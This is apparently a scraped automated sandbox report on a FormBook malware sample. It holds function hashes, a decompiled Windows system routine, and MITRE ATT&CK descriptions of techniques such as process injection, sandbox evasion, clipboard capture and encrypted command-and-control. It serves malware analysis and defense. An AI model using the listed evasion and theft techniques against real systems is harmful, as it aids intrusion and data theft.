Instruction Fuzzy Hash: 78D0A7757503043BE610FAA89C03F2672CCAB54B00F494074FD48D73C3D964F5004176

Uniqueness

Uniqueness Score: -1.00%

Function 030C967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030C9694

Memory Dump Source

Source File: 00000009.00000002.955113627.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: true

Associated: 00000009.00000002.955243780.000000000317B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ec806f3e67d4413828578e07a1ef73006dc6203dab19ac328db23b306dacdbea
Instruction ID: b0afc05a44ca16fe0e8ebf9a16f432586e7f6e52efd9facbc85677ca8234644c
Opcode Fuzzy Hash: ec806f3e67d4413828578e07a1ef73006dc6203dab19ac328db23b306dacdbea
Instruction Fuzzy Hash: 75B09B719435C5C5D651D760460871B7A847BD0741F16C055E1020645A4778C091F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0311FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0311FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E030CCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03115720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03115720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0311fdda
0x0311fde2
0x0311fde5
0x0311fdec
0x0311fdfa
0x0311fdff
0x0311fe0a
0x0311fe0f
0x0311fe17
0x0311fe1e
0x0311fe19
0x0311fe19
0x0311fe19
0x0311fe20
0x0311fe21
0x0311fe22
0x0311fe25
0x0311fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0311FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0311FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0311FE01

Memory Dump Source

Source File: 00000009.00000002.955113627.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: true

Associated: 00000009.00000002.955243780.000000000317B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: c6c503038ac53be494ecf3bd0ffdf3322be65c92f160b2a6ef9631b301de94cc
Instruction ID: c2c8aeab90213e457162dc5d5cba34b8babfbb00f6df460ee8a386047bbf1002
Opcode Fuzzy Hash: c6c503038ac53be494ecf3bd0ffdf3322be65c92f160b2a6ef9631b301de94cc
Instruction Fuzzy Hash: 54F04636600200BFE6309A45CC02FA3BF5BEB89730F150324F6284A1D1DA62F87082F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report eQLPRPErea.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Function 00403166, Relevance: 86.0, APIs: 28, Strings: 21, Instructions: 282
stringfilecomCOMMON

Function 0040531D, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 156
filestringCOMMON

Function 6FC61000, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 84
filememorystringCOMMON

Function 00401FDC, Relevance: 9.1, APIs: 6, Instructions: 72
libraryloaderCOMMON

Function 00405CB0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24
fileCOMMON

Function 00402C37, Relevance: 35.2, APIs: 10, Strings: 10, Instructions: 195
memoryCOMMON

Function 00402EBD, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 176
fileCOMMON

Function 0040179D, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151
stringtimeCOMMON

Function 004015D5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Function 004056DB, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Function 00403132, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Function 00401B71, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72
memoryCOMMON

Function 0040136D, Relevance: 3.1, APIs: 2, Instructions: 55
windowCOMMON

Function 004056AC, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 004030E9, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 0040311B, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 00404EBC, Relevance: 66.8, APIs: 37, Strings: 1, Instructions: 277
windowclipboardmemoryCOMMON

Function 004046C3, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 477
windowmemoryCOMMONCrypto

Function 00404201, Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 242
stringCOMMON

Function 004020A6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
comCOMMON

Function 004026BC, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Function 004060D9, Relevance: .3, Instructions: 334
COMMONCrypto

Function 004068B0, Relevance: .3, Instructions: 300
COMMONCrypto

Function 004038DB, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 347
windowstringCOMMON

Function 00403542, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 215
stringregistrylibraryCOMMON

Function 00403F0B, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 204
windowstringCOMMON

Function 00405723, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 151
filememorystringCOMMON

Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Function 004059FD, Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 180
stringCOMMON

Function 004026FA, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 100
memoryfilestringCOMMON